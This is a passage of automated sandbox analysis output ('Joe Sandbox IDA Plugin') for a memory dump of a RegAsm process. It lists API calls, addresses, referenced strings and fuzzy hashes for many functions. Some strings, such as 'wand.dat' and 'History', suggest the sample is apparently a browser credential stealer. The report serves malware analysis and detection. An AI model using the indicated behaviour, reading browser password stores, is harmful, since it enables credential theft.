                                                                                                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1471605966-0
                                                                                                                                                                                                • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _memicmpwcslen
                                                                                                                                                                                                • String ID: @@@@$History
                                                                                                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                • String ID: </%s>
                                                                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                • String ID: caption
                                                                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                                                • API String ID: 210187428-168460110
                                                                                                                                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                                                                                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1889144086-0
                                                                                                                                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1661045500-0
                                                                                                                                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1549203181-0
                                                                                                                                                                                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$free
                                                                                                                                                                                                • String ID: g4@
                                                                                                                                                                                                • API String ID: 2888793982-2133833424
                                                                                                                                                                                                • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                                • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
